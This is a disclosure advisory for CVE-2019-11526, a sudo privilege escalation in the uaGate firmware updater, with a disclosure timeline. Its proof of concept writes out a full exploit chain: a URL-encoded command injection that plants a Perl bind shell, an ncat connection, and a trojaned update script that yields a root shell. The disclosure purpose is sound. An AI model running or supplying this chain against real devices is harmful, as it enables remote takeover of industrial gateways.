CVE-2019-11526 - uaGate sudo privilege escalation

Abstract:

The uaGates firmware update script, that is called from the webserver user with sudo, handles its parameters in a unsafe fashion. So along with a legitimate firmware image, a second firmware file can be supplied to the script. The second firmware image can be crafted to just override the very same firmware update script installing the malicious firmware image. When the firware update script is called again, it executes the pay load supplied in the malicious firmware update with superuser rights.

Attack Vector

An attacker that already managed to gain the ability to execude code on the device, can use this exploit to gain superuser rights.

Proof of Concept Details

poc #1 (mitigated in 1.71.00.1225)

# deploy a remote bind shell (using cve-2019-11527)
curl --silent --user itadmin:******** 'http://uagate/cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=%26perl%20-e%20%27use%20Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C%20INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose%20C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27%26'
# conect to the uagate on the shell
ncat uagate 4223
# get proper tty 
python -c "import pty; pty.spawn('/bin/bash')"
# start proof of concept 
echo '#!/bin/bash' > /tmp/updateFirmware
echo 'if [ "$1" == "--interactive" ]; then bash; fi;' >> /tmp/updateFirmware
cat /usr/local/bin/updateFirmware >> /tmp/updateFirmware
chmod +x /tmp/updateFirmware
busybox bzip2 /tmp/updateFirmware
# next step requires writing to /usr/local/bin (cve-2019-11528)
mv /tmp/updateFirmware.bz2 /usr/local/bin/updateFirmware.bz2 
cd /usr/local/bin/
echo "just a trash file to nudge the update script" > trash.bz2
sudo ./updateFirmware "updateFirmware.bz2 trash.bz2"
sudo ./updateFirmware --interactive 

Timeline

• day 0 - pentest of uaGate SI Device - 21.12.2018
• day 28 - initial issue related contact to manufacturer - 18.01.2019
• day 63 - issue report to manufacturer - 22.02.2019
• day 66 - secure communication cannel established - 25.02.2019
• day 74 - detailed issue report to manufacturer - 05.03.2019
• day 116 - manufacurer ackloknowledged security issues - 16.04.2019
• day 125 - CVE ID issued by MITRE - 25.04.2019
• day 229 - mitigation found in 1.71.00.1225 - 07.08.2019
• day 293 - released - 10.10.2019

Credits

djo@mioso.com

External links

• uaGate SI Product Page
• Softing AG